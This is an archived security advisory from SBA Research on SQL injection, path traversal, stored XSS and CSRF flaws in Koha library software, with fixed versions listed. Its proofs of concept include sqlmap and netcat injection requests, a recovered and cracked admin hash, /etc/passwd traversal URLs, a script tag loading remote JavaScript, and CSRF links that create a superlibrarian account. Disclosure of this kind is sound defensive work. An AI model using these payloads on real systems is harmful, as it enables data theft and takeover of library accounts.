exploit the possibilities

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection
Posted Jun 26, 2015
Authored by Raschin Tavakoli

Koha ILS suffers from cross site request forgery, cross site scripting, remote SQL injection, and path traversal vulnerabilities. Versions 3.20.x less than or equal to 3.20.1, 3.18.x less than or equal to 3.18.8, and 3.16.x less than or equal to 3.16.12 are affected.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2015-4631, CVE-2015-4632, CVE-2015-4633
MD5 | a7487c24750ea3dc5d6254bc58df41bf

Koha ILS 3.20.x CSRF / XSS / Traversal / SQL Injection

Change Mirror Download
===============================================================================================
SBA Research Vulnerability Disclosure 
===============================================================================================

title: Koha Unauthenticated SQL injection
product:         Koha ILS
affected version: 3.20.x <= 3.20.1, 3.18.x <= 3.18.8, 3.16.x <= 3.16.12
fixed version: 3.20.1, 3.17.8, 3.16.12
CVE numbers: CVE-2015-4633, CVE-2015-4632, CVE-2015-4631
impact: critical
website:         http://www.koha-community.org/

found by:         Raschin Tavakoli / SBA Research Combinatorial Security Testing Group
contact:         cst@sba-research.org


References: http://koha-community.org/security-release-koha-3-20-1/
        http://koha-community.org/security-release-koha-3-18-8/
        http://koha-community.org/security-release-koha-3-16-12/


        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
        http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418
        ​http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423

===============================================================================================

=========================
1. Mutiple SQL Injections
=========================

+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +
+ a) Unauthenticated SQL Injection in OPAC interface (CVE-2015-4633)   +
+ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
The url parameter 'number' in /cgi-bin/koha/opac-tags_subject.pl is vulnerable to SQLI.

Impact:
-------
By injecting malicious sql code a remote attacker can access the database and read arbritary data. If the webserver is misconfigured, the file-system may be accessed as well.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14412


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #
1. Inspect Koha database schema

   Have a look at how to query the database for superlibrarian users:
   http://wiki.koha-community.org/wiki/SQL_Reports_Library#Superlibrarians

   So basically we we need to execute some SQL statement like this:
   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;

2. Query the database with sqlmap

   So let's fire up sqlmap with the --sql-shell parameter and input the query:

   root@kali:/home/wicked# sqlmap -u http://testbox:9001/cgi-bin/koha/opac-tags_subject.pl?number=10 -p number --technique=T --dbms=MySQL --sql-shell --time-sec=4
         _
    ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150513}
   |_ -| . | |     | .'| . |
   |___|_  |_|_|_|_|__,|  _|
         |_|           |_|   http://sqlmap.org


   [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


   [*] starting at 09:20:07


   [09:20:07] [INFO] testing connection to the target URL
   sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
   ---
   Parameter: number (GET)
       Type: AND/OR time-based blind
       Title: MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
       Payload: number=1 PROCEDURE ANALYSE(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(4000000,MD5(0x4b754a4b))))),1)
   ---
   [09:20:09] [INFO] testing MySQL
   [09:20:09] [INFO] confirming MySQL
   [09:20:09] [INFO] the back-end DBMS is MySQL
   web server operating system: Linux Debian
   web application technology: Apache 2.4.10
   back-end DBMS: MySQL >= 5.0.0
   [09:20:09] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER


   sql-shell> select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;
   [09:20:25] [INFO] fetching SQL SELECT statement query output: 'select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1'
   [09:20:25] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
   [09:20:25] [WARNING] time-based comparison requires larger statistical model, please wait..............................                                      
   [09:20:52] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
   admin
   [09:21:46] [INFO] retrieved: $2a$08$taQ
   [09:23:33] [ERROR] invalid character detected. retrying..
   [09:23:33] [WARNING] increasing time delay to 5 seconds 
   afOgEEhU
   [09:25:10] [ERROR] invalid character detected. retrying..
   [09:25:10] [WARNING] increasing time delay to 6 seconds 
   t/gW
   [09:26:13] [ERROR] invalid character detected. retrying..
   [09:26:13] [WARNING] increasing time delay to 7 seconds 
   TOmqnYe1Y6ZNxCENa
   [09:29:57] [ERROR] invalid character detected. retrying..
   [09:29:57] [WARNING] increasing time delay to 8 seconds 
   2.ONk2eZhnuEw5z9OjjxS
   [09:35:08] [ERROR] invalid character detected. retrying..
   [09:35:08] [WARNING] increasing time delay to 9 seconds 

   select userid, password from borrowers where flags=1 and password is not null order by borrowernumber desc limit 1;:    
   'admin, $2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS'

3. Feed john the ripper and be lucky

   root@kali:/home/wicked# echo "$2a$08$taQafOgEEhUt/gWTOmqnYe1Y6ZNxCENa2.ONk2eZhnuEw5z9OjjxS" > ./admin-pass
   root@kali:/home/wicked# john ./admin-pass 
   Loaded 1 password hash (OpenBSD Blowfish [32/64 X2])
   admin            (?)
   guesses: 1  time: 0:00:00:10 DONE (Thu Jun 25 09:45:41 2015)  c/s: 260  trying: Smokey - allstate
   Use the "--show" option to display all of the cracked passwords reliably

   root@kali:/home/wicked# john ./admin-pass --show
   ?:admin

   1 password hash cracked, 0 left

4. Log in with username "admin" and password "admin" ;)

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

+ +++++++++++++++++++++++++++++++++++ +
+ b) SQL Injection in STAFF interface +
+ +++++++++++++++++++++++++++++++++++ +

Vulnerability:
--------------
An SQL Injection vulnerability exists in /cgi-bin/koha/reports/borrowers_out.pl allows remote attacker's to read arbritrary data via the database due to improper input validation of the parameters Filter and Criteria.

Impact:
-------
By injection malicious sql a remote attacker can read arbitrary data from the database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

References:
-----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14426

# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

====================================================================
1. "Criteria" Parameter, Payload: ELT(1=1,'evil') / ELT(1=2,'evil')
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=2,'evil')" | nc testbox 9002


echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 186\r\n\r\nFilter=P_COM&Filter=&Limit=&output=file&basename=Export&MIME=CSV&sep=%3B&report_name=&do_it=1&userid=<username>&password=<password>&branch=&koha_login_context=intranet&Criteria=ELT(1=1,'evil')" | nc testbox 9002

====================================================================
2. "Filter" Parameter, Payload: P_COM'+AND+'a'='a / P_COM'+AND+'a'='b
====================================================================

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='a" | nc testbox 9002

echo -ne "POST /cgi-bin/koha/reports/borrowers_out.pl HTTP/1.1\r\nHost: testbox:9002\r\nContent-Length: 183\r\n\r\nkoha_login_context=intranet&Limit=&Criteria=branchcode&output=file&basename=Export&MIME=CSV&sep=;&report_name=&do_it=1&userid=<userid>&password=<password>&branch=&Filter=P_COM'+AND+'a'='b" | nc testbox 9002

====================================================================

You will notice different output in every second request, demonstrating the evaluation of the payload.

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
3. Path Traversal (CVE-2015-4633)
=================================

Vulnerability
-------------
The "template_path" parmeter in /cgi-bin/koha/svc/members/search and /cgi-bin/koha/svc/members/search is vulnerable to Path Traversal.

Impact
------
A remote attacker my read arbitrary files on the system.

References
----------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408


# ################################################################################################## #
# PoC:     #
# ################################################################################################## #

The following input is used to print out /etc/passwd:

/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

# ################################################################################################## #
# PoC End     #
# ################################################################################################## #

=================================
4. XSS and XSRF 
=================================

Vulnerability
-------------
Koha suffers from various critical XSS and XSRF vulnerabilities due to improper input validation. The site also lacks in the implementation of challenge tokens that prevent cross-site 
forgery (XSRF) attacks. 

The attack can be performed by:

- through a compromised user account. User/Password retrieval can happen via brute force, sniffing or through SQLI (CVE-2015-4633)
- through a user clicking a malicious link (phishing mail, forum link etc.)

The following pages are affected from stored XSS flaws:

/cgi-bin/koha/opac-shelves.pl
/cgi-bin/koha/virtualshelves/shelves.pl

The following pages are affected from relfective XSS flaws:

/cgi-bin/koha/opac-shelves.pl (parameters: "direction", "display")
/cgi-bin/koha/opac-search.pl (parameters: "tag")
/cgi-bin/koha/authorities/authorities-home.pl (parameters: "value") 
/cgi-bin/koha/acqui/lateorders.pl (parameters: "delay")
/cgi-bin/koha/admin/auth_subfields_structure.pl (parameters: "authtypecode","tagfield")
/cgi-bin/koha/admin/marc_subfields_structure.pl (parameters: "tagfield")
/cgi-bin/koha/catalogue/search.pl (parameters: "limit")
/cgi-bin/koha/serials/serials-search.pl (parameters: "bookseller_filter", "callnumber_filter", "EAN_filter", "ISSN_filter", "publisher_filter", "title_filter") 
/cgi-bin/koha/suggestion/suggestion.pl (parameters: "author", "collectiontitle", "copyrightdate", "isbn", "manageddate_from", "manageddate_to", "publishercode",
"suggesteddate_from", "suggesteddate_to")

Impact
----------
The vulnerabilites allow remote attackers to inject arbitrary web script or HTML in order to:

- escalate privileges by targeting staff members with XSRF 
- target users via browser exploits
- target the webserver by combining with other server-side vulnerabilities. 

References
----------------
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418

# ################################################################################################## #
# PoC / Attack Scenario:     #
# ################################################################################################## #

Alice, a student with restricted permissions on the system, receives a phishing mail (or reads in some forum) and clicks the following link:

--> http://<opac-interface>/cgi-bin/koha/opac-shelves.pl?shelves=1&addshelf=Malicious+Input+<script+src='http://cst.sba-research.org/x.js'/>&sortfield=title&category=2&allow_add=0&allow_delete_own=1&allow_delete_other=0

Bob, library admin, recognizes the new malicious list entry. He logs into the staff area and browses the public lists in order to delete the entry. Once he opens 

--> http://<staff-interface>/cgi-bin/koha/virtualshelves/shelves.pl

the malcious code get's executed. The code can then perform any unauthorized actions with the pemissions of user bob. For example:

Create new user:
-----------------------

--> http://testbox:9002/cgi-bin/koha/members/memberentry.pl?nodouble=&destination=&check_member=&borrowernumber=&nodouble=&title=&firstname=&othernames=&sex=&streetnumber=&streettype=&address2=&city=&state=&zipcode=&country=&phone=&phonepro=&mobile=&email=&emailpro=&fax=&B_address=&B_address2=&B_city=&B_state=&B_zipcode=&B_country=&B_phone=&B_email=&contactnote=&altcontactsurname=&altcontactfirstname=&altcontactaddress1=&altcontactaddress2=&altcontactaddress3=&altcontactstate=&altcontactzipcode=&altcontactcountry=&altcontactphone=&sort1=&sort2=&dateexpiry=&opacnote=&borrowernotes=&patron_attr_1=&BorrowerMandatoryField=surname%7Cdateofbirth%7Ccardnumber%7Caddress&category_type=A&updtype=I&op=insert&surname=hacker&dateofbirth=10%2F06%2F2000&address=fictional&select_city=%7C%7C%7C&cardnumber=9182734629182364&branchcode=MAURES&categorycode=P_COM&dateenrolled=24%2F06%2F2015&userid=hacker&password=hacker&password2=hacker&patron_attr_1_code=PROFESSION&setting_messaging_prefs=1&modify=yes&borrowernumber=&save=Save&setting_extended_patron_attributes=1

Give the new user superlibririan permission:
----------------------------------------------------------

--> http://testbox:9002/testbox:9002/cgi-bin/koha/members/member-flags.pl?member=7855&newflags=1&flag=superlibrarian

The attacker can now log as superlibrarian.

Side Note: In order to make the attack work, alice needs to be logged in to the Open Public Catalog interface at the time of when clicking the malicious link.
Alice needs to have access to the OPAC interface and to have permissions to create public lists.

# ################################################################################################## #
# PoC / Attack Scenario End     #
# ################################################################################################## #







Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    4 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close